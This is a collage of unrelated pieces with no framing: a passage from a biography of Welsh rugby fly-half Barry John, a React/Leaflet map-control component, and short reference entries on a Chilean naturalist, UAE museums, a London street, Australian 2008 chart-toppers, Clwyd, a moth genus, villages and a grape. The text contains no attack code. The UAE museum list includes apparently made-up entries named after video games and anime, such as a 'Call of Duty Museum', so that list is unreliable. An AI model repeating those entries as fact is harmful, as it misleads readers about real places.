On 13 December 1969, Cardiff played host to the sixth touring South Africa team. The tour is remembered for the anti-apartheid protests that followed the team, and before the match 1,500 protesters had marched through the Welsh capital. John was unavailable for the encounter having fractured a rib while playing for the Barbarians against an Oxford University Past and Present eleven days earlier. His place was taken by Beverley Davies and Cardiff lost 17–3. John recovered in time for the South Africa against Wales match on 24 January, and was selected alongside Edwards. The game was played in atrocious muddy conditions, and a last minute try from Edwards snatched a 6–6 draw Both John and Edwards had a substandard game that day, but they combined well in the last move of the game to avoid defeat. A week later on 31 January, John and Edwards faced the South Africans again, this time as part of the Barbarians. The South Africans produced their best play of the tour to come from behind to win 21–12.
There was little rest for the two Cardiff half-backs when on 7 February 1970 they were called back into the Wales team for the first match of the 1970 Five Nations Championship, a home encounter at the Cardiff Arms Park against Scotland. Despite Scotland being 9–0 ahead at one point, Wales took the initiative and scored four tries without reply, winning 18–9. The England game was John and Edwards' fifteenth Wales international together, in an away match which recorded the largest haul of tries for the Welsh team in England since 1908. John scored one of the tries along with a dropped goal. Due to an injury to Edwards, John finished the game alongside Chico Hopkins. With only Ireland standing in front of a Welsh Triple Crown win, hopes were high, but Ireland, made John and Edwards look ordinary in a 0–14 defeat. John was unavailable for the final game of the tournament to France, his place taken by Phil Bennett. Wales beat France and shared the Championship with the French.
The 1971 Five Nations Championship was a new dawn for Welsh rugby. The new National Stadium was completed, and the team now into their Second Golden era were both experienced and talented. John and Edwards played in all four games, starting with an easy win over England. Wales won 22–6, with John scoring six points from two dropped goals. The second game of the Championship, played against Scotland, was a close encounter, won by Wales 19–18 thanks to a late Gerald Davies try converted by John Taylor. Barry John scored eight of Wales' points, with a try, penalty goal and a conversion; missing only his trademark drop goal to complete a full house of scores. John surpassed his Scotland tally in the next match, a home game against Ireland, scoring 11 points with a dropped goal, conversion and two penalty goals. Seen as one of Wales' more accomplished victories, the 23–0 win gave the team a Triple Crown title, and set up a Grand Slam encounter with France. Despite the low score, the 9–5 win over France at Stade Colombes on 27 March was a match of the highest quality. Edwards and John scored all the points in the encounter, Edwards with a try, John a try and a penalty goal. This was Wales' first Grand Slam since 1952 and the 1971 squad is seen as the greatest ever to be fielded by Wales.
1971 British Lions
In 1971, on their tour of New Zealand, John was again selected for the British Lions. With the painful memories of the woeful 1969 Wales Tour to New Zealand, John was determined to succeed with the Lions. Under the management of Doug Smith and the coaching of Carwyn James (also from Cefneithin), John rose to great individual heights with his match-winning performances. Of the 26 tour matches, he played in 17, only bettered by captain John Dawes and "Mighty Mouse" prop Ian McLauchlan. By the time of the first Test in Carisbrook, John had faced six teams, including the New South Wales Waratahs and the New Zealand Māori. All six games had been won by the Lions and John had recorded 88 points, including a full house against Waikato. In the First Test John terrorised New Zealand's fullback Fergie McCormick with ruthless tactical kicking. The All Blacks were shunted all over the field by John, who was well protected by his forwards, something that he was not afforded with Wales in 1969. The Lions won the Test 9–3, six of the Lions' points coming from two John penalties; McCormick never played for the All Blacks again.
Before the second Test John played in two more tour matches; wins over Southland and New Zealand Universities, in which he scored 32 points. In the game against the Universities John scored one of his most famous tries. John dummied a drop-goal before running through the Universities' defence, stepping inside the final tackler before touching the ball down under the posts, stunning the home crowd. The second Test, played at Christchurch, finished with the series drawn after New Zealand won 22–12, John scoring half of the Lions points. In between the second and third Tests, John played in three of the four regional matches, scoring 37 points including two tries in the game against Wairarapa.
A win in the third Test was vital to keep the Lions hope of a series win alive. John scored ten points of the 13–3 win, the other three coming from Wales' team-mate Gerald Davies. The final Test ended in a 14–14 draw, giving the series to the tourists. John scored eight of the Lions points, having scored in every match, Test and regional, he had played in.
It was on this tour that John received the nickname "The King" from the New Zealand press, though as early as 1965 he remembered being dubbed "King John" by a newspaper sub-editor while still at Llanelli. He scored 30 of the Lions 48 points over the four Tests, scored a record 191 points across the tour (6 tries, 31 conversions, 8 dropped goals and 27 penalties) and cemented his reputation as one of the game's greatest players.
1972 Championship and retirement
John's final season with Wales ended disappointingly as both Scotland and Wales refused to travel to Ireland due to the increased violence in Northern Ireland and the events of Bloody Sunday. Despite this, John had a good Championship, scoring 35 points in the three games against England, Scotland and France. The opener, away to England, was won 12–3, with John scoring two penalty goals and converting a J. P. R. Williams try. This was followed by a win over Scotland, in which John played well, converting three of the five Welsh tries and scoring three penalty goals. John's final international was at home to France. He successfully converted four penalty goals in a 20–6 victory to Wales, and in scoring his final penalty surpassed the Wales international points scoring record of Jack Bancroft set nearly 60 years earlier. The Welsh Rugby Union's refusal to allow travel to Ireland stole the team's possibility of a consecutive Grand Slam title.
In 1972, at the age of only 27, with 25 Wales caps and five British Lions caps, Barry John retired from the game. John cited the media attention and the unfair expectations of his country as reasons, believing he was "living in a goldfish bowl". It is part of rugby folklore that the event that convinced him to retire from rugby was when a young girl curtsied to him outside the opening of an extension to a local bank but in Frank Keating's book The Great Number Tens, John is quoted as saying that it was actually the head cashier who curtsied to him.
His 25 caps for Wales resulted in 90 points scored, 5 tries, 9 conversions, 13 penalties and 8 dropped goals. His British Lions career added a further 30 international points, with a single try, 3 conversions, 5 penalties and 2 dropped goals. For Cardiff he played 5 seasons, playing 93 matches, during which he scored 24 tries and 30 dropped goals. His dropped goal total for Cardiff was the club's second highest total, drawn with Wilf Wooller but short of Percy Bush's tally of 35.
International games
Critical reception
As the authors of the official history of the Welsh Rugby Union, David Smith and Gareth Williams wrote of him: The clue to an understanding of his achieved style lies in what he could make others do to themselves. The kicking, whether spinning trajectories that rolled away or precise chips or scudding grubbers, was a long-range control, but his running, deft, poised, a fragile illusion that one wrong instant could crack, yet rarely did, was the art of the fly-half at its most testing. He was the dragonfly on the anvil of destruction. John ran in another dimension of time and space. His opponents ran into the glass walls which covered his escape routes from their bewildered clutches. He left mouths, and back rows, agape.
Gareth Edwards, in his 1978 autobiography, when describing John, wrote: He had this marvellous easiness in the mind, reducing problems to their simplest form, backing his own talent all the time. One success on the field bred another and soon he gave off a cool superiority which spread to others in the side. Physically he was perfectly made for the job, good and strong from the hips down and firm but slender from the waist to the shoulders.
Gerald Davies, who played with John for Wales and the British Lions, in his 1971 autobiography when contrasting Gareth Edwards' and John's different temperaments described Edwards as "fiery and impulsive", but John was "... fairer, aloof and apart. Whilst the hustle and bustle went on around him he could divorce himself from it all; he kept his emotions in check and a careful rein on the surrounding action. The game would go according to his will and no-one else's ..."
Rodney Webb, who represented England between 1967 and 1972, is quoted as saying "Barry John's punting was phenomenal. He could drop the ball on a sixpence and he could do it every time". Webb, who developed the modern rugby ball, believes that John can not be compared to modern kickers because "the modern ball is coated in a laminate, has dimpled surfaces, unobtrusive lacing and multi panels. In the seventies the balls soaked up water, swerved all over the place and were placed in the mud and slime when kicking for goal".
John came third in the 1971 BBC Sports Personality of the Year Award, beaten by winner Princess Anne and runner-up George Best. He was one of the inaugural inductees of the International Rugby Hall of Fame in 1997 and in 1999 was inducted into the Welsh Sports Hall of Fame. In 2015 he was inducted into the World Rugby Hall of Fame.
Amateurism
As an amateur rugby union player John was not paid to play rugby at club or international level. To receive money for playing would have been recognised as an act of professionalism and would have resulted in action from one of the governing unions, normally suspension or a ban. To prevent players switching to professional rugby league, players were given 'boot money' by their clubs or sponsors, named after the early practice of placing money in the players' boots. In his 2011 book Addy, Meirion Appleton said that in the 1970s he made illegal payments to both John and Gareth Edwards. Appleton said that before an international match he gave both players envelopes containing money from sportswear manufacturer Adidas. John was never charged with taking illegal payments during his career.
Personal history
John was born at Low-land, a smallholding at Cefneithin. He was the second child of William and Vimy John, his brother Delville was three years his senior. John had a further four siblings, Alan, Clive, Madora and Diane. All three of his brothers played rugby. Delville played for Cefneithin, captaining them for two seasons; Alan progressed from the local club to Llanelli and also toured Argentina with Wales; while Clive was a Llanelli wing forward who was selected for Wales 'B'. The family went to live at Foelgastell, staying with an uncle and aunt, shortly after John's birth but returned to Cefneithin when John was two. His early schooling was at Cefneithin Primary, and after failing his eleven-plus exam he spent a year at Cross Hands senior centre. He passed the entrance exam and was accepted into Gwendraeth Grammar School at Drefach.
At eighteen he left grammar school, and was awarded a place at Trinity College, Carmarthen, with ambitions of becoming a teacher. He studied physical education, junior science and horticulture. He left Trinity in the summer of 1967, and took up a post as a physical education teacher at Monkton House School in Cardiff, a private school for boys between the ages of eight and sixteen. John moved to Cardiff and shared a house with several other rugby players, including former Llanelli team mate Gerald Davies. John quit his position at Monkton House when he toured South Africa in 1968 and never taught again. On his return from Africa, John moved back to his family home at Cefneithin. He spent six weeks unemployed and during this period he considered turning to professional rugby league, almost signing for St Helens R.F.C. Following an interview with David Coleman for the BBC programme, Sportsnight, in which his jobless situation was discussed, John was offered a job working for Forward Trust, a finance company in Cardiff. When John quit playing rugby in 1972 he also left his job as a finance representative, signing a contract to write a weekly column and cover important matches for the Daily Express. He was also signed to take part in sport programmes presented by HTV, the Wales and West of England commercial television company.
In September 1969, John married Janet Talfan Davies, daughter of Alun Talfan Davies QC, a leading Welsh lawyer. John and Jan had four children (Kathryn, Lucy, Anna and David) and as of 2016, eleven grandchildren (Emily, Rebecca, Sam, Tom, Ben, Anna, Edward, Will, Gwen, Ella and Charlotte); John and his wife are now separated.
In 2009, he decided to sell his rugby memorabilia, including his Wales caps, stating that he felt no nostalgia towards the items, and the honour of playing for Wales was all that mattered.
References
Bibliography
External links
Wales profile
Profile at International Rugby Hall of Fame website
Portrait of Barry John by David Griffiths
Profile at sporting-heroes.net
Welsh caps at sporting-heroes.net
Lions profile
1945 births
Living people
Barbarian F.C. players
British & Irish Lions rugby union players from Wales
Cardiff RFC players
Llanelli RFC players
People associated with Trinity University College
Rugby union fly-halves
Rugby union players from Carmarthenshire
Wales international rugby union players
Welsh rugby union players
World Rugby Hall of Fame inductees |
```jsx
import L from 'leaflet';
import ReactDOM from 'ReactDOM';
import React from 'React';
import PropTypes from 'prop-types';
import './Contours.scss';
import ContoursPanel from './ContoursPanel';
class ContoursButton extends React.Component {
static propTypes = {
tasks: PropTypes.object.isRequired,
map: PropTypes.object.isRequired
}
constructor(props){
super(props);
this.state = {
showPanel: false
};
}
handleOpen = () => {
this.setState({showPanel: true});
}
handleClose = () => {
this.setState({showPanel: false});
}
render(){
const { showPanel } = this.state;
return (<div className={showPanel ? "open" : ""}>
<a href="javascript:void(0);"
onClick={this.handleOpen}
className="leaflet-control-contours-button leaflet-bar-part theme-secondary"></a>
<ContoursPanel map={this.props.map} isShowed={showPanel} tasks={this.props.tasks} onClose={this.handleClose} />
</div>);
}
}
export default L.Control.extend({
options: {
position: 'topright'
},
onAdd: function (map) {
var container = L.DomUtil.create('div', 'leaflet-control-contours leaflet-bar leaflet-control');
L.DomEvent.disableClickPropagation(container);
ReactDOM.render(<ContoursButton map={this.options.map} tasks={this.options.tasks} />, container);
return container;
}
});
``` |
Federico Philippi or Friedrich Heinrich Eunom Philippi (16 December 1838 – 16 January 1910) was a German zoologist and botanist active in Chile. He was the youngest son of the famed naturalist Rodolfo Amando Philippi and Caroline Krumwiede. He was born in Naples. The son of Federico Philippi, Julio Philippi Bihl, became a lawyer, economist and politician. The granddaughter of Federico and daughter of Julio, Adriana married Jaime Eyzaguirre in 1934.
References
German emigrants to Chile
Scientists from Naples
1838 births
1910 deaths
Employees of the Chilean National Museum of Natural History
Federico |
This is a list of museums in the United Arab Emirates.
Al Ahmadiya School
Al Ain National Museum
Al Eslah School Museum
Al Hisn Fort Museum
Anime Museum
Dubai Museum
Etihad Museum
Fujairah Heritage Village
Fujairah Museum
Guggenheim Abu Dhabi
Louvre Abu Dhabi
Saeed Al Maktoum House
Salsali Private Museum
Salwa Zeidan Gallery
Sharjah Art Museum
Sharjah Archaeology Museum
Sharjah Calligraphy Museum
Sharjah Classic Cars Museum
Sharjah Heritage Museum
Sharjah Museum of Islamic Civilization
Sharjah Maritime Museum
Sharjah Science Museum
Sheikh Obaid bin Thani House
Sheikh Zayed Palace Museum
Sword Art Museum
Sword Art Online Museum
Zayed National Museum
Tanki Online Museum
Carbon 12 Dubai
Call of Duty Museum
AL Murab’a police museum in AL Ain
See also
List of museums
Culture of the United Arab Emirates
Museums
United Arab Emirates
Museums
Museums
United Arab Emirates |
Half Moon Street is a street in the City of Westminster, London. The street runs from Curzon Street in the north to Piccadilly in the south.
History
Half Moon Street was built from 1730. It takes its name from a public house that once stood on the corner with Piccadilly.
Notable inhabitants
James Boswell, biographer of Dr Johnson, had lodgings in the street in 1768 at the home of Mr Russell, an upholsterer. Lola Montez, mistress of King Ludwig I of Bavaria, lived in the street in 1849. The street was known for its genteel lodgings and apartments which was still the case when Somerset Maugham visited in 1930.
The WWI poet Siegfried Sassoon also had lodgings in 14 Half Moon Street.
In the twentieth century, Sax Rohmer (1883-1959) creator of Dr Fu Manchu, once lived in the street. A blue plaque marks the spot.
Buildings
Among the listed buildings in the street are parts of Flemings Mayfair Hotel and Green Park Hotel. Other listed buildings include numbers 6, 7 and 8, 12a, 14, 15, 24, and 25.
In popular culture
Half Moon Street is the setting for the first act of Oscar Wilde's play The Importance of Being Earnest and serves as the character Algernon's home.
Sax Rohmer made repeated use of the street in his work. In other early-20th century fiction, Sapper's hero Bulldog Drummond lived in the street. The street is the London address of the fictional detective Paul Temple and his wife Steve and also frequently appears in the Georgian and Regency novels of Georgette Heyer.
In the 1986 film thriller Half Moon Street, the main character lives in a flat on the street.
61 Half Moon Street is the address of Belinda Blumenthal of Rocky Flintstone's Belinda Blinked series, as mentioned by Cian O'Mahony in 'Footnotes: Understanding The "Timeline"' in Season 6 of the My Dad Wrote a Porno podcast.
In the Aubrey-Maturin novel series by Patrick O'Brian, the fictional physician and spy Stephen Maturin lived on Half Moon Street with his wife Diana Villiers at the start of The Ionian Mission.
References
External links
Streets in the City of Westminster |
The ARIA Singles Chart ranks the best-performing singles in Australia. Its data, published by the Australian Recording Industry Association, is based collectively on each single's weekly physical and digital sales. In 2008, fifteen singles claimed the top spot, including Timbaland's "Apologize", which started its peak position in late 2007. Twelve acts achieved their first number-one single in Australia, either as a lead or featured artist: Leona Lewis, Flo Rida, T-Pain, Colbie Caillat, Gabriella Cilmi, Jordin Sparks, Katy Perry, Kid Rock, Lady Gaga, Colby O'Donis, Kings of Leon and Wes Carr. Five collaborations topped the chart. Lady Gaga earned two number-one singles during the year for "Just Dance" and "Poker Face".
"Poker Face" was the longest running number-one single, having topped the ARIA Singles Chart for six weeks in 2008 and two additional weeks in 2009. Perry's "I Kissed a Girl" topped the chart for six consecutive weeks, while Lewis' "Bleeding Love" and Cilmi's "Sweet About Me" both stayed at number one for five weeks. Rihanna's "Don't Stop the Music", Sparks' "No Air", Pink's "So What", and Kings of Leon's "Sex on Fire" each spent four weeks at the number-one spot.
Chart history
Number-one artists
See also
2008 in music
List of number-one albums of 2008 (Australia)
List of top 25 singles for 2008 in Australia
List of top 10 singles in 2008 (Australia)
References
Number-one singles
Australia Singles
2008 |
Smilovtsi is a village in Gabrovo Municipality, in Gabrovo Province, in northern central Bulgaria.
References
Villages in Gabrovo Province |
Clwyd ( , ) is a preserved county of Wales, situated in the north-east corner of the country; it is named after the River Clwyd, which runs through the area. To the north lies the Irish Sea, with the English ceremonial counties of Cheshire to the east and Shropshire to the south-east. Powys and Gwynedd lie to the south and west respectively. Clwyd also shares a maritime boundary with Merseyside along the River Dee. Between 1974 and 1996, a slightly different area had a county council, with local government functions shared with six district councils. In 1996, Clwyd was abolished, and the new principal areas of Conwy County Borough, Denbighshire, Flintshire and Wrexham County Borough were created; under this reorganisation, "Clwyd" became a preserved county, with the name being retained for certain ceremonial functions.
This area of north-eastern Wales has been settled since prehistoric times; the Romans built a fort beside a ford on the River Conwy, and the Normans and Welsh disputed the territory. They built their castles at strategic locations as they advanced and retreated, but in the end England prevailed, and Edward I conquered the country in 1282. The Act of Union in 1535 incorporated Wales under the English Crown and made it subject to English law.
Traditionally, agriculture was the mainstay of the economy of this part of Wales, but with the Industrial Revolution, the North Wales Coalfield was developed and parts of eastern Clwyd around the Dee estuary and Wrexham became industrialised. The advent of the railway running from Chester along the North Wales coast in the mid-19th century made it easy for urban dwellers from Lancashire and Cheshire to visit the seaside towns of North Wales.
History
North Wales has had human settlements since prehistoric times. By the time the Romans reached Britain, the area that is now Clwyd was occupied by the Celtic Deceangli tribe. They lived in a chain of hill forts running through the Clwydian Range and their tribal capital was Canovium, at an important crossing of the River Conwy. This fell to the Romans, who built their own fort here, in about AD 75; and the whole of Wales was soon under their control. After the Roman departure from Britain in AD 410, the successor states of Gwynedd and Powys controlled the area. From about 800 onwards, a series of dynastic marriages led to Rhodri Mawr inheriting the kingdoms of Gwynedd and Powys. After his death, this kingdom was divided among his three sons and further strife followed: not only Welsh battles were fought, but there were also many raids by Danes and Saxons.
The Normans conquest of England at first had little effect on North Wales. This was to change as the city of Chester on the River Dee became the base for successive campaigns against the country in the 13th century. The coastal plain of Clwyd was the main invasion route, and a number of castles were built there to assist these advances. The castles at Flint and Rhuddlan date from this period, and were the first to be built by Edward I of England in North Wales during his successful conquest in 1282. After this, the rule of the Welsh princes was at an end and Wales was annexed to England. This area was known as the Principality of Wales from 1216 to 1536. From 1301, the Crown's lands in north and west Wales formed part of the appanage of England's heir apparent, who was given the title "Prince of Wales". Under the Laws in Wales Act of 1535, Wales became permanently incorporated under the English Crown and subject to English law.
Although the Industrial Revolution did not much affect the rural parts of the area, there was considerable industrial activity in the North Wales Coalfield, particularly around Wrexham. The Bersham Ironworks at Bersham, in the same area, was at the forefront of technological advances and was most famous for being the original working site of the industrialist John Wilkinson who invented new processes for boring cannons. The Williams-Wynn family of Wynnstay had become rich after the dissolution of the monasteries and owned vast estates in Clwyd with resources including lead, tin and copper as well as corn and timber.
Geography
Clwyd is in the northeastern corner of Wales. It is bounded by the Irish Sea to the north, the Welsh preserved counties of Gwynedd to the west and Powys to the south, and the English ceremonial counties of Shropshire and Cheshire to the southeast and east respectively; much of the eastern boundary follows the course of the River Dee and its estuary. Other large rivers in the area include the River Alyn, a tributary of the Dee, the River Clwyd and the River Conwy in the west. The northern coastal strip is heavily developed for tourism and has many resorts, including Llandudno, Colwyn Bay, Colwyn, Abergele, Rhyl and Prestatyn. In the northeast lies Deeside, the coastal plain beside the Dee estuary, and this part of Clwyd is heavily developed for industry. The area around Wrexham and the commuter settlements close to Chester are also heavily built up.
To the west of this is a ridge of mountains with a steep scarp slope to the west, the Clwydian Range. The highest point of these hills is Moel Famau at . The north-central part is the broad Vale of Clwyd, and the best agricultural land lies here. To the south of this, the land is much higher and more rugged, the Denbigh Moors and the Berwyn range are here. The central and western parts are much more rural than the coastal area and the east, with part of the Snowdonia National Park lying in the western part. The population as of 2007 is estimated at 491,100, based on figures for the four component unitary authority areas.
Since the 2003 boundary changes, its coastline has extended from the Dee Estuary in Flintshire through to Llanfairfechan.
Clwyd consists of the whole of the historic county of Flintshire, and most of Denbighshire. Since 2003 it has also included the former district of Aberconwy, which lies in the historic county of Caernarfonshire, and also the former Edeyrnion Rural District in the historic county of Merionethshire.
Economy
The land uses of any region depend on the underlying geology which influences the soil types. In the Clwydian Range, lead and spar minerals have been mined in the past, and limestone quarried from Llantysilio Mountain, Ruabon Mountain and Minera Mountain near Wrexham. The Minera Limeworks were once the largest lime workings in North Wales. Later, road building stone was extracted but the quarries closed in 1992. Coal mining in the North Wales Coalfield ceased in the second half of the twentieth century but used to be a large source of employment in the area. The main products being manufactured in industrial east Clwyd include aircraft components (Airbus), engines (Toyota), paper (Shotton Paper) and steel processing, and the port of Mostyn builds and supports offshore windfarms.
Agriculture, largely based on livestock, has traditionally been the main occupation in the central and western parts. There are a mix of large and small farm businesses, and a thriving dairy sector in the Vale of Clwyd. Many of the towns have livestock markets and the farming industry supports farm machinery merchants, vets, feed merchants, contractors and all the ancillary trades connected with agriculture. With their incomes on the decline, farmers have found opportunities in tourism, rural crafts, specialist food shops, farmers' markets and value-added food products.
The upland areas with their sheep farms and small, stone-walled fields are attractive to visitors, and redundant farm buildings are often converted to self-catering accommodation while the farmhouses themselves supply bed-and-breakfast opportunities. The arrival of the railway on the coast in the mid-nineteenth century opened up travel from Merseyside and caused a boom in tourism, with guesthouses in seaside towns offering board and lodging for the urban visitors. More recently caravan sites and holiday villages have blossomed and there has been an increase in the ownership of "second homes".
Various initiatives designed to boost the economy of North Wales are being attempted in 2016. These include the Northern Gateway project on the former Sealand RAF site on Deeside, and a redevelopment project for the former Rhyl seafront and funfair.
Administrative history
The Local Government Commission for Wales set up in 1958 was the first to recommend wholesale amalgamation of the administrative counties outside Glamorgan and Monmouthshire, with extensive boundary changes; however the then Minister of Housing and Local Government Sir Keith Joseph decided not to accept the report, noting that county amalgamations in England had been highly unpopular when proposed.
In 1967, after a change of government, the Secretary of State for Wales Cledwyn Hughes published a white paper which revived the idea of amalgamation, but instead of the boundary changes proposed in the previous report, treated each county as a whole. The report recommended a single new Gwynedd incorporating Denbighshire, Flintshire, Caernarfonshire, Merionethshire and Anglesey. The white paper stated that "the need for early action is particularly urgent in Wales", and so the issue was not referred to a Royal Commission as in England. Opponents criticised the proposed new council for being too large, and in November 1968 a new Secretary of State announced that Gwynedd would be divided into two.
This revised proposal was continued in a further white paper in March 1970, although this proposed that the councils be unitary authorities which would have no district councils below them. The incoming Conservative government resurrected two-tier local government in a consultative document published in February 1971, again with the same upper-tier boundaries. Some minor changes having been made to the existing boundaries due to special local factors, the Local Government Act 1972 duly created Clwyd as a merger of Flintshire with most of Denbighshire, along with the Edeyrnion Rural District from Merionethshire. The 1970 white paper had introduced the name of Clwyd by reference to the River Clwyd and the Clwydian range of hills; Clwyd was the only new Welsh county which did not take its name from an ancient kingdom.
For second-tier local government purposes, Clwyd was divided into six districts: Alyn and Deeside, Colwyn, Delyn, Glyndŵr, Rhuddlan and Wrexham Maelor, each being operated by a district or borough council. These were abolished, along with the county itself, on 1 April 1996. Clwyd County Council's coat of arms was granted in December 1974. The design of the shield, crest and motto includes elements taken from the arms of the former councils of Flintshire and Denbighshire. The green and white wave represents the Vale of Clwyd and the Clwydian Range lying between the two parts. The cross and choughs come from Flintshire's shield, which itself incorporated the traditional arms of Edwin of Tegeingl, while the black lion of the Princes of Powys Fadog is taken from Denbighshire's shield. The motto, Tarian Cyfiawnder Duw can be translated as "The shield of Justice is God".
Clwyd County Council and its districts were abolished by the Local Government (Wales) Act 1994, and local government would be replaced by the four unitary authorities of Flintshire, Wrexham County Borough, Denbighshire, and parts of Conwy (along with some smaller communities moving to Powys). The Act also abolished the County, and states the term "county" would be synonymous with the "principal areas" created by the 1994 Act. However the Act then created a further set of "preserved counties", which were based on the eight created by the 1972 Act. These Preserved Counties, similar in respect to English Ceremonial counties, would be retained for a variety of purposes, including Lieutenancy and Shrievalty.
Clwyd County Council and its six districts ceased operations at midnight on 1 April 1996, and local government was immediately transferred to the new principal areas of Conwy, Denbighshire, Flintshire and Wrexham. However, although bearing the same names, the boundaries of Flintshire and Denbighshire were substantially different from those of the historic counties. As it happened, the county records for historic Flintshire had been retained at the Hawarden branch of the Clwyd Records Office while those for historic Denbighshire had continued to be held at the Ruthin branch, so there was no problem in segregating the records.
The Preserved County of Clwyd came into effect on the same day that Clwyd County Council was abolished. The preserved county was almost identical to the 1974–96 county, but had a few minor changes in line with changes to local government boundaries, the communities of Llanrhaeadr-ym-Mochnant, Llansilin and Llangedwyn being transferred from Clwyd to Powys.
2003 boundary review
In 2003, the borders of Clwyd were changed to cover the remainder of Conwy (which had previously been part of Gwynedd), which was part of a Wales-wide re-organisation of the preserved counties, so that boundaries of the preserved counties would contain whole current principal areas only.
This led to some areas, such as the Aberconwy district, moving to a preserved county it had never been administered by in the past, and therefore these moves went generally unreported due to the preserved county's limited status. The Boundary Commission proceeded to retain the eight preserved counties, and modified their borders in 2003 to match with the incumbent principal area boundaries. The 2003 arrangement brings towns such as Llandudno and Conwy into the preserved county of Clwyd.
Legacy
Some local organisations still make use of the word "Clwyd" in their name, often because their membership covers a wider area than their present unitary authority. These organisations include the Theatr Clwyd, which is based in Mold and is the largest producing arts centre in Wales. It provides young people the opportunity to get involved in drama. The Clwyd Family History Society can help its members to access many historical documents concerning northeastern Wales, and the Clwyd-Powys Archaeological Trust is one of four archaeological trusts covering the whole of Wales. The Clwyd County Darts Association organises tournaments and takes part in inter-county matches. The Clwyd East Football League was created in 2011 to represent the North East Wales area at the fifth tier of Welsh Football. It has subsequently changed its name to the North East Wales Football League. The Clwyd Pension Fund is the Local Government pension scheme inherited from Clwyd County Council, now providing pension schemes for Wrexham, Flintshire and Denbighshire unitary authorities and former districts.
The position of Lord Lieutenant of Clwyd also continues as the Monarch's personal representative, as with the other seven preserved counties of Wales. The current Lord Lieutenant is Henry George Fetherstonhaugh, who was appointed in 2013.
Landmarks
The Pontcysyllte Aqueduct was built by Thomas Telford in 1805 and is the largest aqueduct in the United Kingdom; it carries the Llangollen Canal over the River Dee and is a World Heritage Site, being considered a masterpiece of civil engineering. The Clwydian Range and Dee Valley constitute an Area of Outstanding Natural Beauty, one of just five in the whole of Wales. Denbigh, Colwyn and Ruthin are historic towns and Llangollen hosts the Llangollen International Musical Eisteddfod in July each year.
The Gop is a Neolithic mound, the second largest such structure in Britain being only superseded by Silbury Hill. Caer Drewyn is one of many Iron Age hill forts in Clwyd that attest to human occupation of this area for millennia. Maen Achwyfan Cross is a carved 10th century wheel cross depicting Celtic and Viking symbols. The castles of Rhuddlan and Flint were built by the Normans during their invasion of North Wales and Castell Dinas Brân was a Welsh fortress of the same period. St Asaph Cathedral also dates from the thirteenth century as does the medieval Cistercian abbey of Valle Crucis.
Bodnant Garden is a formal garden in a landscaped setting, and Erddig Hall is a stately home, both owned by the National Trust. Other fine country houses in Clwyd include Trevor Hall and Faenol Fawr, Bodelwyddan, while Plas Mawr and Aberconwy House are historic town houses in Conwy. Also in Conwy is the Conwy Suspension Bridge, one of the first such bridges in the world.
Transport
The North Wales Coast Line is the railway line from Crewe to Holyhead, served by Transport for Wales and Avanti West Coast services. Trains leaving Crewe pass through Chester, cross the River Dee into Wales, and continue through stations such as: Shotton, Flint, Prestatyn, Rhyl, Colwyn Bay, Llandudno Junction, Conwy and Bangor, to Holyhead, from where there is a ferry service to Ireland. Passengers can change at Shotton for the Borderlands Line, which links Wrexham with Bidston on the Wirral Peninsula in England. The Conwy Valley Line links Llandudno Junction to Blaenau Ffestiniog via Betws-y-Coed and was constructed mainly for use as a freight line for the transport of slate to the quay at Deganwy for export by sea. It is a scenic route with a number of request stops. The Shrewsbury–Chester line connects , northwards to Chester and southwards to other stations in the present-day county borough and to .
There are no motorways in Clwyd. The A55 dual carriageway road passes from Chester through St Asaph to the North Wales coast at Abergele, after which it runs parallel to the railway line through Conwy and Bangor to terminate at Holyhead. The A483 connects Wrexham northwards to Chester, and southwards to Ruabon and Chirk. The A548 passes from Chester to Abergele through Deeside and along the coast, before leaving the coast and terminating at Llanrwst. The main road from London is the A5 which enters Clwyd at Chirk and passes northwestwards through Llangollen, Corwen and Betws-y-Coed to join the A55 and terminate at Bangor. The A543 crosses the Denbigh Moors from southeast to northwest, and the A525 links Ruthin with St Asaph. There are local bus services between the main centres of population. Several services by Arriva Buses Wales run along the main coast road between Chester and Holyhead, linking the coastal resorts. Other routes include: Llandudno to Llanrwst and Betws-y-Coed via Conwy and Dolgarrog; Rhyl to Denbigh; Wrexham to Chester; and Wrexham to Mold.
See also
List of Lord Lieutenants of Clwyd
List of High Sheriffs of Clwyd
List of places in Denbighshire
List of places in Flintshire
List of places in Conwy County Borough
List of places in Wrexham County Borough
Further reading
Gordon Emery – Curious Clwyd (1994)
References
Preserved counties of Wales |
Elysius is a genus of moths in the family Erebidae. The genus was erected by Francis Walker in 1855.
Species
Elysius amapaensis Régo Barros, 1971
Elysius anomala Jörgensen, 1935
Elysius atrata (Felder & Rogenhofer, 1874)
Elysius atrobrunnea Rothschild, 1909
Elysius barnesi Schaus, 1904
Elysius carbonarius (Dognin, 1891)
Elysius castanea Rothschild, 1909
Elysius chimaera (H. Druce, 1893)
Elysius cingulata (Walker, 1856)
Elysius conjunctus Rothschild, 1910
Elysius conspersus Walker, 1855
Elysius deceptura (H. Druce, 1905)
Elysius disciplaga (Walker, 1856)
Elysius discopunctata Gaede, 1923
Elysius felderi Rothschild, 1909
Elysius flavoabdominalis Rothschild, 1935
Elysius gladysia Schaus, 1920
Elysius hades (H. Druce, 1906)
Elysius hampsoni Dognin, 1907
Elysius hermia (Cramer, [1777])
Elysius intensa Rothschild, 1935
Elysius intensus Rothschild, 1910
Elysius itaunensis Régo Barros, 1971
Elysius jonesi Rothschild, 1910
Elysius lavinia H. Druce, 1906
Elysius melaleuca (Felder, 1874)
Elysius melanoplaga Hampson, 1901
Elysius meridionalis Rothschild, 1917
Elysius ochrota Hampson, 1901
Elysius ordinaria (Schaus, 1894)
Elysius phantasma Schaus, 1905
Elysius pretiosa Jörgensen, 1935
Elysius proba (Schaus, 1892)
Elysius pyrosticta Hampson, 1905
Elysius rabusculum (Dognin, 1905)
Elysius ruffin Schaus, 1924
Elysius sebrus (H. Druce, 1899)
Elysius subterra Rothschild, 1917
Elysius superba (H. Druce, 1884)
Elysius systron Schaus, 1904
Elysius terra H. Druce, 1906
Elysius terraoides Rothschild, 1909
Elysius thrailkilli (Schaus, 1892)
References
Phaegopterina
Moth genera |
Gakoura is a village and administrative center (chef-lieu) of the commune of Guidimakan Keri Kafo in the Cercle of Kayes in the Kayes Region of south-western Mali. The village lies on the north bank of the Senegal River.
References
Populated places in Kayes Region |
Brnik may refer to:
Brnik, Poland, a village in Poland
, a village in Republic of Macedonia
or:
Zgornji Brnik, a village in Slovenia
Spodnji Brnik, a village in Slovenia
or:
Ljubljana Airport, an airport in Slovenia |
Bouvier is a white wine grape and table grape planted primarily in Central Europe—most notably in Austria, Hungary, Slovakia and Slovenia, where it is also known as Ranina.
